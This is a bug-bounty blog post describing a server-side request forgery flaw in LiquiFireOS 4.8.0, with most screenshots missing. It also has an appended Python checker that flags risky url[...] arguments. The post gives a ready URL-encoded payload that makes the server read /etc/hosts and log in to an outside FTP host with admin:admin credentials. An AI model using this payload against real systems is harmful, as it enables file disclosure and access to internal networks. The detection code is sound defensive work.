Saturday, 28 December 2019

Testing SSRF in LiquiFireOS

During one bug bounty I found that the target webapp was presenting some 'interesting errors' in its responses. ;) As this is always a nice and cool 'hint' to see during pentests/CTFs, I decided to dig a little deeper. Below you will find the details of the SSRF I found in LiquiFireOS. Here we go...

Today we'll start here:


This solution was 'something new' for me. An example response I found online during the bug bounty:


I decided to use Burp Suite and try a few of the scenarios described in one of the posts available on the blog:


A few more cases (and a sample response):



So it looks like we're talking about version 4.8.0 :) Cool, next:

As you can see (example requests from Intruder), there is an interesting part of the link, for example the url argument.
I decided to try some other 'url' values :) Results below:


That looks interesting ;> So what is the problem? Maybe the port? Maybe the hostname? I'll try changing both of them:



That's nice :) Is there any other parameter available for this kind of modification?


To verify that, I decided to read a very nice book for Christmas, called the manual: ;)


You can find a few more cool cases and examples there.

As I saw in one of the error messages, there are only four schemes accepted: http://, ftp://, file:// and cms://. I decided to try http and ftp:

Nice response. ;)

I decided to check whether the target app would be able to do something else for me, for example log in to some (internal? ;)) FTP server. Because I do not have one (in the 'target/bug bounty company' ;)), I decided to use a nice-for-cats FTP server I found online. Let's try to log in with admin:admin credentials:


Looks promising ;)

If you look at the main page ('of the target'), you should see something like this:


Sample payload to use in your URL:
"%3Fset%3Dsource[/etc/hosts]%2Corigin[/etc/]%2Ccategory[2]%2Ctype[DESCRIPTIVESTILLLIFE]%2Chmver[3]%26call%3Durl[ftp:%2f%2fadmin:admin@xxxxxxxxx.pl/]"

Maybe you'll find it useful.
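For defenders, here is an added example (my own code, not from the original post or from LiquiFire) that URL-decodes a request query string, pulls out the LiquiFire-style call=url[...] arguments seen above and flags the things that made the request above an SSRF: schemes other than http(s), embedded user:pass@ credentials, and hosts outside an allow-list. The allowed host list and the extra sample URLs in the checks are constructed; the payload constant is the one quoted in the post, with its placeholder host kept as-is.

```python
import re
from urllib.parse import unquote, urlsplit

# Payload quoted in the post above (the host is the post's own placeholder).
POST_PAYLOAD = ("%3Fset%3Dsource[/etc/hosts]%2Corigin[/etc/]%2Ccategory[2]"
                "%2Ctype[DESCRIPTIVESTILLLIFE]%2Chmver[3]"
                "%26call%3Durl[ftp:%2f%2fadmin:admin@xxxxxxxxx.pl/]")

# Assumed policy: the image engine should only fetch over http(s) from a
# known set of origin servers. The host list below is constructed.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"images.example.com"}

# Argument syntax seen in the post: ...&call=url[<value>]
CALL_URL = re.compile(r"call=url\[(?P<url>[^\]]*)\]")


def canonicalise(query, max_rounds=3):
    """URL-decode until stable (bounded) so %2f and %252f both become '/'."""
    for _ in range(max_rounds):
        decoded = unquote(query)
        if decoded == query:
            break
        query = decoded
    return query


def extract_call_urls(query):
    """Return every url[...] argument found in a decoded query string."""
    return [m.group("url") for m in CALL_URL.finditer(canonicalise(query))]


def classify_url(url):
    """Label one url[...] value according to the assumed policy above."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:           # ftp://, file://, cms://, ...
        return "blocked-scheme:" + (scheme or "none")
    if parts.username is not None or parts.password is not None:
        return "blocked-credentials"            # user:pass@host in the URL
    if parts.hostname not in ALLOWED_HOSTS:     # internal hosts, localhost, ...
        return "blocked-host:" + str(parts.hostname)
    return "allowed"


def check_request(query):
    """(url, verdict) pairs for every call=url[...] in one request."""
    return [(u, classify_url(u)) for u in extract_call_urls(query)]


if __name__ == "__main__":
    for url, verdict in check_request(POST_PAYLOAD):
        print(verdict, url)
```

The same check can be run over web-server access logs to find earlier probes of the set/call arguments, not only on live requests.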

See you next time!

Cheers
